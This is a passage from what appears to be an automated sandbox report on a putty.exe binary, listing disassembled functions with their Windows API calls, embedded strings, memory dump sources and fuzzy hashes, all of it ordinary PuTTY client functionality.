                            • #15.COMCTL32(?,?,000000FF), ref: 0043A18B
                            • SendDlgItemMessageA.USER32(?,?,00000182,?,00000000), ref: 0043A19F
                            • #15.COMCTL32(?,?,?), ref: 0043A20B
                            • SetWindowLongA.USER32(00000000,00000000,00000001), ref: 0043A220
                            • SendDlgItemMessageA.USER32(?,?,00000180,00000000,00457667), ref: 0043A23A
                            • #14.COMCTL32(?,?,?,00000001,?,00000180,00000000,00457667), ref: 0043A24E
                            • SetWindowLongA.USER32(?,00000000,00000001), ref: 0043A262
                            • SendDlgItemMessageA.USER32(?,?,00000188,00000000,00000000), ref: 0043A2A4
                            • MessageBeep.USER32(00000000), ref: 0043A2AF
                            • SendDlgItemMessageA.USER32(?,?,0000018B,00000000,00000000), ref: 0043A2C2
                            • SendDlgItemMessageA.USER32(?,?,00000199,00000000,00000000), ref: 0043A314
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message$ItemSend$LongWindow$Beep
                            • String ID:
                            • API String ID: 2915373918-0
                            • Opcode ID: e157a1aab09075507fc921cba1e737102990613782da314b516460ca38caf700
                            • Instruction ID: 0a6de024250292aeba328e66abb63c7a5e35da013ff5db74abcf94e83080761e
                            • Opcode Fuzzy Hash: e157a1aab09075507fc921cba1e737102990613782da314b516460ca38caf700
                            • Instruction Fuzzy Hash: 19719C7004420AEFCF218F54DD459ABBBB6FF08344F10552AF991922A1C736EDB1DB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: Internal networking trouble
                            • API String ID: 0-3700075771
                            • Opcode ID: 8aca131887f23cb177e2a64b7159aa016e20f2b7d6c4eb67819064fa45d3ced9
                            • Instruction ID: 75c08d8d098d834a88a36c3cf5356de64fa8c3ee3eb6a55600d215e6dd627134
                            • Opcode Fuzzy Hash: 8aca131887f23cb177e2a64b7159aa016e20f2b7d6c4eb67819064fa45d3ced9
                            • Instruction Fuzzy Hash: ED910471504110AFEF209F64CC8997F7BA9EF04355B2545ABF909CA246DB38CC82CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,004761A8,000007FF), ref: 00445DCC
                            • _strrchr.LIBCMT ref: 00445DDE
                            • _strrchr.LIBCMT ref: 00445DEF
                            • CoCreateInstance.OLE32(0046C8C4,00000000,00000001,0046C8F4,?), ref: 00445E64
                              • Part of subcall function 0044974C: _strlen.LIBCMT ref: 00449766
                              • Part of subcall function 0044974C: RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449797
                            • _strcspn.LIBCMT ref: 00445F05
                            • _strcspn.LIBCMT ref: 00445F99
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcspn_strrchr$CreateFileInstanceModuleNameOpen_strlen
                            • String ID: %.*s%s$..\windows\winjump.c$Connect to PuTTY session '$Run %.*s$appname
                            • API String ID: 3346247394-3778623159
                            • Opcode ID: 0f5824e23baeb7c20c4420b20658211f8af3458171e97ec44b077a01e7f430b8
                            • Instruction ID: 4e1149513c1cddde36fdb35d419dcc4211a9bcca3a3b657898fa7c3de4ae22ad
                            • Opcode Fuzzy Hash: 0f5824e23baeb7c20c4420b20658211f8af3458171e97ec44b077a01e7f430b8
                            • Instruction Fuzzy Hash: 6C61A871904204BFEF10AFA5DC86DAE7B68EF44358F20446BF404A7192DB799E05C79E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreatePopupMenu.USER32 ref: 0043D877
                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0043D922
                            • DeleteMenu.USER32(00474DCC,00000000,00000000,?,00000000,?,?,00000000,00000000,?), ref: 0043D968
                            • DeleteMenu.USER32(00474DCC,00000200,00000000,?,?,00000000,00000000,?), ref: 0043D977
                            • InsertMenuA.USER32(00000000,00000010,00000010,00000000,S&pecial Command), ref: 0043D991
                            • InsertMenuA.USER32(00000000,00000010,00000800,00000200,00000000), ref: 0043D9A7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Menu$DeleteInsert$AppendCreatePopup
                            • String ID: ..\windows\window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
                            • API String ID: 1803796953-3117707344
                            • Opcode ID: 50985c5cdb6338a61484ed805499b038a35a8630363a0cf14e111ecf80a9f798
                            • Instruction ID: f716ba6e74fcb05d6137015d9dc48625a53a0921aef2e9370a1c0a39c38b803b
                            • Opcode Fuzzy Hash: 50985c5cdb6338a61484ed805499b038a35a8630363a0cf14e111ecf80a9f798
                            • Instruction Fuzzy Hash: 60410470A04305AFD720DF14EC45F2677A5FF88B00F11043EF659962A1D7B5A858DB9E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetTickCount.KERNEL32 ref: 0044034F
                            • MessageBeep.USER32(00000000), ref: 00440364
                            • GetTickCount.KERNEL32 ref: 0044036A
                            • PlaySoundA.WINMM(00000000,00000000,00020001), ref: 00440396
                            • MessageBoxA.USER32(?,?,00000030), ref: 004403E1
                            • GetTickCount.KERNEL32 ref: 00440407
                            • Beep.KERNEL32(00000320,00000064), ref: 00440426
                            • MessageBeep.USER32(000000FF), ref: 00440430
                            • GetTickCount.KERNEL32 ref: 00440436
                            Strings
                            • Unable to play sound file%sUsing default sound instead, xrefs: 004403A9
                            • %.70s Sound Error, xrefs: 004403C0
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CountTick$BeepMessage$PlaySound
                            • String ID: %.70s Sound Error$Unable to play sound file%sUsing default sound instead
                            • API String ID: 1693037769-2062101151
                            • Opcode ID: fc171fb02cd39a5d714f7c9e0f92fa6d51ac409d368c6c5cd9b13834fb9f7725
                            • Instruction ID: 7898eadf5f8e9ad27b4d3061a56f7eab077a7d8e983b090a55d27307dbe37007
                            • Opcode Fuzzy Hash: fc171fb02cd39a5d714f7c9e0f92fa6d51ac409d368c6c5cd9b13834fb9f7725
                            • Instruction Fuzzy Hash: CB218231944304EBEB209F64FD4AB593B69EB00719F508077F704A60F2DA79A9A4CF5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetProcAddress.KERNEL32(00000000,GetSecurityInfo), ref: 004488A1
                            • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004488BF
                            • GetProcAddress.KERNEL32(00000000,GetTokenInformation), ref: 004488E5
                            • GetProcAddress.KERNEL32(00000000,InitializeSecurityDescriptor), ref: 0044890B
                            • GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorOwner), ref: 00448931
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc
                            • String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetSecurityDescriptorOwner$advapi32.dll
                            • API String ID: 190572456-1280498236
                            • Opcode ID: 147404f718c38340a52a9cfb238b8301b1f628c3ea244f458a9c3803dc355b30
                            • Instruction ID: e69762124b79aaea25ebe3cc4b322c2f4d21d8f10d78ee421258ab8e9858e140
                            • Opcode Fuzzy Hash: 147404f718c38340a52a9cfb238b8301b1f628c3ea244f458a9c3803dc355b30
                            • Instruction Fuzzy Hash: 3C1149B0E0C780DE96A19F69AC4193B76E5B6447507A5053FE00CD2264EE7898C18B2F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • The Local Security Authority cannot be contacted., xrefs: 00445047
                            • One or more of the SecBufferDesc structures passed as an OUT parameter has a buffer that is too small., xrefs: 00445039
                            • No credentials are available in the security package., xrefs: 00445078
                            • No authority could be contacted for authentication.The domain name of the authenticating party could be wrong, the domain could be unreachable, or there might have been a trust relationship failure., xrefs: 00445071
                            • The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong security package. Passing a token to the wrong package can happen if client and server did not negotiate the proper s, xrefs: 00445086, 0044508C
                            • SSPI status OK, xrefs: 00445040
                            • The handle passed to the function is invalid., xrefs: 00445032
                            • Internal SSPI error, xrefs: 0044506A
                            • The logon failed., xrefs: 0044507F
                            • The target was not recognized., xrefs: 0044502B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: Internal SSPI error$No authority could be contacted for authentication.The domain name of the authenticating party could be wrong, the domain could be unreachable, or there might have been a trust relationship failure.$No credentials are available in the security package.$One or more of the SecBufferDesc structures passed as an OUT parameter has a buffer that is too small.$SSPI status OK$The Local Security Authority cannot be contacted.$The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong security package. Passing a token to the wrong package can happen if client and server did not negotiate the proper s$The handle passed to the function is invalid.$The logon failed.$The target was not recognized.
                            • API String ID: 4218353326-3912637527
                            • Opcode ID: f3cdb7d9c93b13640cfff6bbf4dd655a9b9d4732e6c3df7f052bf379198df9c1
                            • Instruction ID: caaec0d047360d25483e2d884f05c723b6173bdc6bcf14ce21eff86758734f4a
                            • Opcode Fuzzy Hash: f3cdb7d9c93b13640cfff6bbf4dd655a9b9d4732e6c3df7f052bf379198df9c1
                            • Instruction Fuzzy Hash: C1115E28249E029FBF34895914D483B1298D700750B38C92BE4C7DB323EA1DDC82A2CF
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MessageBoxA.USER32(00000000,?,00001010), ref: 004410FE
                            • MessageBoxA.USER32(00000000,?,00000010), ref: 004410AD
                              • Part of subcall function 004407DE: DeleteObject.GDI32(?), ref: 004407F9
                              • Part of subcall function 004407DE: CoUninitialize.OLE32 ref: 00440822
                            • IsZoomed.USER32 ref: 0044111F
                            • GetWindowLongA.USER32(000000F0,00000000), ref: 00441156
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            • SetWindowLongA.USER32(000000F0,00000000), ref: 0044118E
                            • SetWindowPos.USER32(00000000,00000020,?,00000020,?,00000020), ref: 004411BD
                            • CheckMenuItem.USER32(00000000,00000180,00000008), ref: 004411D7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$Window$LongMessage_strcat$CheckDeleteFileItemMenuModuleNameObjectUninitializeZoomed_strncpy
                            • String ID: %.70s Fatal Error$..\windows\window.c$IsZoomed(hwnd)
                            • API String ID: 1933943531-2082414888
                            • Opcode ID: fce3dfe40c68ffd62334ac97658c6fac96cb1df66c404b75bc79ef7e9b5d18ed
                            • Instruction ID: 2de357ffd558fe43d35be5c2fc604559be3ac260902c71da26710dd846257ed8
                            • Opcode Fuzzy Hash: fce3dfe40c68ffd62334ac97658c6fac96cb1df66c404b75bc79ef7e9b5d18ed
                            • Instruction Fuzzy Hash: 1931C872844314BFEB116BA5EC06E9E3F6CEF04714F104036FA18A11A2EB75AA90C7DD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 004405B1: IsZoomed.USER32(00441145), ref: 004405B7
                            • IsZoomed.USER32 ref: 0044111F
                            • GetWindowLongA.USER32(000000F0,00000000), ref: 00441156
                            • SetWindowLongA.USER32(000000F0,00000000), ref: 0044118E
                            • SetWindowPos.USER32(00000000,00000020,?,00000020,?,00000020), ref: 004411BD
                            • CheckMenuItem.USER32(00000000,00000180,00000008), ref: 004411D7
                            • IsZoomed.USER32(004419AD), ref: 004411FB
                            • ShowWindow.USER32(00000003), ref: 00441227
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Zoomed$Long$CheckItemMenuShow
                            • String ID: ..\windows\window.c$IsZoomed(hwnd)
                            • API String ID: 4117804504-916244480
                            • Opcode ID: 3ec283dfc081739c2a32071f0cc6aaf619f962b93ca7e01c52f32e0b0ad0e5eb
                            • Instruction ID: f2ad5695fe1bf6f6b03ed18751ddfbf57a71519467fc076ed9d38c6c7511ecfd
                            • Opcode Fuzzy Hash: 3ec283dfc081739c2a32071f0cc6aaf619f962b93ca7e01c52f32e0b0ad0e5eb
                            • Instruction Fuzzy Hash: 3021D131548302FEFB206BA1FC0AF5A3F68EF04715F144136FA15B01F2DA74A9909A4D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LCMapStringW.KERNEL32(00000000,00000100,00470560,00000001,00000000,00000000,004705B8,00000038,00454728,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004513B0
                            • GetLastError.KERNEL32 ref: 004513C2
                            • MultiByteToWideChar.KERNEL32(?,00000000,004549BC,?,00000000,00000000,004705B8,00000038,00454728,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00451449
                            • MultiByteToWideChar.KERNEL32(?,00000001,004549BC,?,?,00000000), ref: 004514CA
                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004514E4
                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 0045151F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: String$ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1775797328-0
                            • Opcode ID: a43d89358ad8aeb206864d184156587fef644e56b484bbedb7401d2c5a464903
                            • Instruction ID: 0f9fab2180f5283e91257d1693d835265a1b2066faed6e6e93dda9ee53aa62c6
                            • Opcode Fuzzy Hash: a43d89358ad8aeb206864d184156587fef644e56b484bbedb7401d2c5a464903
                            • Instruction Fuzzy Hash: C9B16B72800209EFCF119FA5DC81AEE7BB5FF08316F14422AFD15A2262D7398D95DB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: "$"$""""$\$\\\\$\\\\
                            • API String ID: 4218353326-3638190407
                            • Opcode ID: cb5a1a88f93284883957e37ad21eed0aa82e4593c8e5a9006c1fc46deeab44d5
                            • Instruction ID: 4c63627dc264242675428a62019f5fa9301fcc115b382ca89d5a57a235029a65
                            • Opcode Fuzzy Hash: cb5a1a88f93284883957e37ad21eed0aa82e4593c8e5a9006c1fc46deeab44d5
                            • Instruction Fuzzy Hash: 6191E030A046149FEF298E59D8417BE7BE1EF45315F2440ABEC85AB381C778DD428BC8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat$___shr_12
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?$DVE
                            • API String ID: 1152255961-2241684345
                            • Opcode ID: c9d8e649ea83fb23fe338f750a5184fbdea9415ef6662dd88caa0f876bf846e9
                            • Instruction ID: 8d05ff337edf10f2f8c340d7a3cb319d48a4cc3e973a770f373b4c0b5bd96aa5
                            • Opcode Fuzzy Hash: c9d8e649ea83fb23fe338f750a5184fbdea9415ef6662dd88caa0f876bf846e9
                            • Instruction Fuzzy Hash: C181253190429A9EDF11CF68C8447AEBBB4AF11316F46459BDC90DB283D378960DC769
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDC.USER32 ref: 0043DBD8
                            • GetDeviceCaps.GDI32(00000000,00000026), ref: 0043DC0F
                            • CreatePalette.GDI32(00000000), ref: 0043DC5C
                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0043DC75
                            • RealizePalette.GDI32(00000000), ref: 0043DC78
                            • GetStockObject.GDI32(0000000F), ref: 0043DC82
                            • SelectPalette.GDI32(00000000,00000000), ref: 0043DC8A
                            • ReleaseDC.USER32(00000000), ref: 0043DC93
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Palette$Select$CapsCreateDeviceObjectRealizeReleaseStock
                            • String ID: MG
                            • API String ID: 1667595171-1230926311
                            • Opcode ID: 89a8f6134c4102484f0a11a465038c8ab4a31c12b6d0b8e327957d4f7ffbc3dc
                            • Instruction ID: 834fe70462b67766a0c93dc7cb939f6e32f49242705a7289a5784bd79bf9282f
                            • Opcode Fuzzy Hash: 89a8f6134c4102484f0a11a465038c8ab4a31c12b6d0b8e327957d4f7ffbc3dc
                            • Instruction Fuzzy Hash: A4313B719183505BE3214B39AC48B677FE5DF8A705F09907EF5858B3E2CABA4805C319
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • addr->addresses && step.curraddr < addr->naddresses, xrefs: 0044752F
                            • ..\windows\winnet.c, xrefs: 0044752A
                            • <unknown>, xrefs: 00447501
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strncpy$htonlinet_ntoa
                            • String ID: ..\windows\winnet.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
                            • API String ID: 3148508921-295716202
                            • Opcode ID: 2d1c96696a7e8d9b4f116b082bd65d1411f611de6a0a7fb343fa42cd2c6e19d0
                            • Instruction ID: 6b8d8acdaf2bc2b623c7f4f3772b87c72555fe1c657293fcb93496f1691a44e9
                            • Opcode Fuzzy Hash: 2d1c96696a7e8d9b4f116b082bd65d1411f611de6a0a7fb343fa42cd2c6e19d0
                            • Instruction Fuzzy Hash: 8521C771904741BFFB208F159C40E6B7B68FF85314F18855AF8045B652D379E9428BB9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetDlgItemTextA.USER32(?,00000001,00000000), ref: 0043BA76
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemText
                            • String ID: ..\windows\winctrls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->generic.type == CTRL_FONTSELECT$gvE$pixel$point
                            • API String ID: 3367045223-3986346739
                            • Opcode ID: cb851731548ac4e033d6a3b4961245ca795a79c7986cf5070f24ade9058a65ff
                            • Instruction ID: 07d64e6c7caa35e5ab0b519a4ad7607eb4f04de528870c8fcec56afb0a3255d9
                            • Opcode Fuzzy Hash: cb851731548ac4e033d6a3b4961245ca795a79c7986cf5070f24ade9058a65ff
                            • Instruction Fuzzy Hash: FB11B672244601AFEB04BE56DC82E377759DF89715F20903FF50096252EB2D9C618B9F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetForegroundWindow.USER32 ref: 004485D1
                            • GetCapture.USER32 ref: 004485E7
                            • GetClipboardOwner.USER32 ref: 004485FD
                            • GetQueueStatus.USER32(000000BF), ref: 00448618
                            • GetCursorPos.USER32(?), ref: 00448632
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00448649
